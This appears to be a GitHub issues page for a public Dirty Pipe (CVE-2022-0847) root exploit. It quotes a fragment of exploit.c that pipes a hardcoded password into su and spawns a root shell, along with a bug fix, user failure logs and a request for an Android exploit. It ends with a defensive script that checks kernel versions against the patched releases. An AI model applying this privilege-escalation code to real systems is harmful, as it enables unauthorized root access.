arinerron / cve-2022-0847-dirtypipe-exploit
A root exploit for CVE-2022-0847 (Dirty Pipe)
License: GNU General Public License v2.0
In exploit.c, execv will fail, because argv is not terminated with NULL:
char *argv[] = {"/bin/sh", "-c", "(echo aaron; cat) | su - -c \""
                "echo \\\"Restoring /etc/passwd from /tmp/passwd.bak...\\\";"
                "cp /tmp/passwd.bak /etc/passwd;"
                "echo \\\"Done! Popping shell... (run commands now)\\\";"
                "/bin/sh;"
                "\" root"};
execv("/bin/sh", argv);
It should be:
char *argv[] = {"/bin/sh", "-c", "(echo aaron; cat) | su - -c \""
                "echo \\\"Restoring /etc/passwd from /tmp/passwd.bak...\\\";"
                "cp /tmp/passwd.bak /etc/passwd;"
                "echo \\\"Done! Popping shell... (run commands now)\\\";"
                "/bin/sh;"
                "\" root", NULL};
execv("/bin/sh", argv);
Backing up /etc/passwd to /tmp/passwd.bak ...
Setting root password to "aaron"...
Password: aaron
su: Authentication failure
Works well on Ubuntu (kernel 5.8.0-63-generic) but doesn't work on Raspberry Pi; details below:
Linux raspberrypi 5.10.17-v7l+ #1414 SMP Fri Apr 30 13:20:47 BST 2021 armv7l GNU/Linux
When run, it just hangs here:
Backing up /etc/passwd to /tmp/passwd.bak ...
and the file gets really big, way beyond what it should be (there are fewer than 20 users):
-rw-r--r-- 1 pi pi 665M Feb 1 18:50 /tmp/passwd.bak
If I don't kill it, I think it would just keep running until the Pi is outta space. Any thoughts what could fix it?
su: must be run from a terminal
If I got this error message, how can I deal with this problem?
This is a CVE that allows for out-of-bounds read. Please attempt to create an exploit for this one to get a full filesystem backup or disk image backup of an unrooted Android device. Works on all versions of Android, unlike this one which works only on snow cone. This has potential for full backup of data so the user feels good to unlock the bootloader and enjoy the root.
ENV:
#cat /etc/os-release
NAME="Ubuntu"
VERSION="18.04.5 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.5 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic
#uname -a
Linux xxx 4.15.0-147-generic #151-Ubuntu SMP Fri Jun 18 19:21:19 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
test@xxx:~/CVE-2022-0847-DirtyPipe-Exploit$ ./exploit
Backing up /etc/passwd to /tmp/passwd.bak ...
Setting root password to "aaron"...
system() function call seems to have failed :(
Tested on a vanilla VM and a configured image, both running Redhat 7.
Authentication fails for both, so the exploit does not work.
Note: Any claims that CrowdStrike allows this exploit are 100% false.
uname -a
Linux 39 5.4.0-104-generic #118-Ubuntu SMP Wed Mar 2 19:02:41 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
head -n1 /etc/passwd
root: x:0:0:root:/root:/bin/bash
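Several reports above quote a kernel release string. As an added example (not code from the repository or from any reporter), the shell function below classifies a release against the upstream CVE-2022-0847 range, which this page does not state: introduced in 5.8, fixed in 5.10.102, 5.15.25 and 5.16.11. The function name and result labels are assumptions, and a distribution kernel may carry a backported fix that its version number does not show.

```sh
#!/bin/sh
# Added example: triage a kernel release string for CVE-2022-0847 exposure.
# Assumed upstream facts (not from this page): bug introduced in 5.8;
# fixed in 5.10.102, 5.15.25, 5.16.11 and in 5.17 onward.
# "in-range" means "confirm against the vendor advisory", not "exploitable".
# Pre-release (-rc) builds are not distinguished from final releases.

dirtypipe_status() {   # hypothetical helper name
    rel=${1:-$(uname -r)}
    base=${rel%%[!0-9.]*}            # "5.10.17-v7l+" -> "5.10.17"
    case $base in
        [0-9]*) ;;
        *) echo "unknown"; return 1 ;;
    esac
    old_ifs=$IFS; IFS=.; set -- $base; IFS=$old_ifs
    maj=${1:-0}; min=${2:-0}; pat=${3:-0}

    # Older than 5.8: the vulnerable code path does not exist yet.
    if [ "$maj" -lt 5 ] || { [ "$maj" -eq 5 ] && [ "$min" -lt 8 ]; }; then
        echo "not-affected"; return 0
    fi
    # 5.17 and later ship with the fix.
    if [ "$maj" -gt 5 ] || [ "$min" -ge 17 ]; then
        echo "fixed-upstream"; return 0
    fi
    # Stable branches that received a fix; other 5.8-5.16 branches did not.
    case $min in
        10) fix=102 ;;
        15) fix=25 ;;
        16) fix=11 ;;
        *)  fix= ;;
    esac
    if [ -n "$fix" ] && [ "$pat" -ge "$fix" ]; then
        echo "fixed-upstream"
    else
        echo "in-range"
    fi
}

# Release strings quoted in the reports on this page.
for r in 5.8.0-63-generic 5.10.17-v7l+ 4.15.0-147-generic 5.4.0-104-generic; do
    printf '%-22s %s\n' "$r" "$(dirtypipe_status "$r")"
done
```

Called with no argument, the function classifies the running kernel from `uname -r`.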